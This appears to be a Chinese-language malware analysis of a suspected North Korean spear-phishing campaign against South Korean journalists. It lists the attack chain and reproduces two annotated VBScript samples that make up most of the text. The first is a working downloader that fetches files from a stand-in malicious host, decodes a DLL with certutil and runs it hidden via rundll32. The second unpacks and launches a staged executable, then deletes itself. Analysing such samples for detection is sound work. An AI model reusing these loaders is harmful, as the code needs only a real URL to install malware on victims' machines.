1、信息来源
疑似朝鲜通过鱼叉攻击韩国统一部记者的APT事件整理
https://mp.weixin.qq.com/s/4IFV31MBNbANnCVaJj7ZPQ
https://twitter.com/blackorbird/status/1082553543280680962
2、利用思路
1、 下载http://恶意网址/note[.]png作为文件到%temp%路径下,通过【powershell Invoke-item】运行。
2、 下载http://恶意网址/svchow.dat改名为svchow[.]dat
3、 certutil -f -decode 强制覆盖文件、base64解码并改名为dll
4、 通过powershell运行rundll32加载svchow.dll中的MyRTLCreateFunction函数运行恶意代码。
3、实例代码
下载代码:
' Analyst annotation of the stage-1 downloader. Process chain visible here:
' wscript/cscript -> powershell -> certutil, and wscript/cscript -> powershell -> cmd -> rundll32.
Set wshShell = CreateObject("Wscript.shell")
' %TEMP% is the drop directory for both downloaded files (note.png, svchow.dat)
' and for the decoded DLL (svchow.dll).
dir = wshShell.ExpandEnvironmentStrings("%TEMP%")
docUrl = "http://恶意网址/note.png"
' Microsoft.XMLHTTP + Adodb.Stream: classic COM download-to-disk pattern;
' the request is synchronous (third argument False).
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", docUrl, False
xHttp.Send
docPath = dir + "\note.png"
with bStrm
.type = 1 '//binary
.open
.write xHttp.responseBody
.savetofile docPath, 2 '//overwrite
end With
' Invoke-Item opens the file with its registered handler; window style 0 (hidden),
' and the script blocks (True) until it returns. The .png name suggests a decoy,
' but the actual content is not shown here — TODO confirm from the sample.
CreateObject("Wscript.shell").Run "powershell Invoke-item '" + dir + "\note.png'", 0, true
docUrl = "http://恶意网址/svchow.dat"
' Second download, same pattern, for the encoded payload.
dim xHttp2: Set xHttp2 = createobject("Microsoft.XMLHTTP")
dim bStrm2: Set bStrm2 = createobject("Adodb.Stream")
xHttp2.Open "GET", docUrl, False
xHttp2.Send
with bStrm2
.type = 1 '//binary
.open
.write xHttp2.responseBody
.savetofile dir + "\svchow.dat", 2 '//overwrite
end With
' certutil used as a LOLBin to base64-decode svchow.dat into svchow.dll (-f = overwrite).
' Detection point: certutil.exe with "-decode" spawned under powershell.exe.
CreateObject("Wscript.shell").Run "powershell -windowstyle hidden certutil -f -decode " & dir & "\svchow.dat, " & dir & "\svchow.dll",0,true
' rundll32 loads the decoded DLL from %TEMP% and calls export MyRTLCreateFunction.
' Detection point: rundll32.exe with a DLL path under %TEMP% and a non-standard export name.
CreateObject("Wscript.shell").Run "powershell -windowstyle hidden cmd /c rundll32 " & dir & "\svchow.dll,MyRTLCreateFunction",0,true
转码运行exe:
' Analyst annotation: strips a 2-byte prefix from a staged executable, rewrites it in place,
' runs it, then deletes the running script (self-deletion — a detection/forensics point:
' the .vbs will be missing from disk afterwards; rely on script-block/process telemetry).
Dim fIn, fOut, sFilename, sBOM
sFilename = "C:\windows\temp\xxx.exe"
Set fIn = CreateObject("adodb.stream")
fIn.Type = 1 'adTypeBinary
fIn.Mode = adModeRead
fIn.Open
fIn.LoadFromFile sFilename
' Reads the first 5 bytes but only the first two are inspected below.
sBOM = fIn.Read(5)
' The bytes tested are 0xFF,0xFE (decimal 255, 254), i.e. a UTF-16 LE BOM.
' The original note about a UTF-8 BOM (0xEF,0xBB,0xBF / 239,187,191) does not match this check.
If AscB(MidB(sBOM, 1, 1)) = 255 _
And AscB(MidB(sBOM, 2, 1)) = 254 Then
fIn.Position = 2 ' Skip the 2-byte BOM; the rest of the stream is copied as-is
Set fOut = CreateObject("adodb.stream")
fOut.Type = 1 'adTypeBinary
fOut.Mode = adModeReadWrite
fOut.Open
fIn.CopyTo fOut
' Overwrites the same file so the result is a bare PE on disk.
fOut.SaveToFile sFilename, 2 'adSaveCreateOverwrite
fOut.Flush
fOut.Close
Set shell = CreateObject("Wscript.Shell")
' Hidden window (0), does not wait (False). Executable launched from C:\windows\temp.
shell.Run "c:\windows\temp\xxx.exe",0,False
Set fso = CreateObject("Scripting.FileSystemObject")
' Deletes the script itself by name; note nothing runs if the BOM check above fails.
fso.DeleteFile(WScript.ScriptName)
End If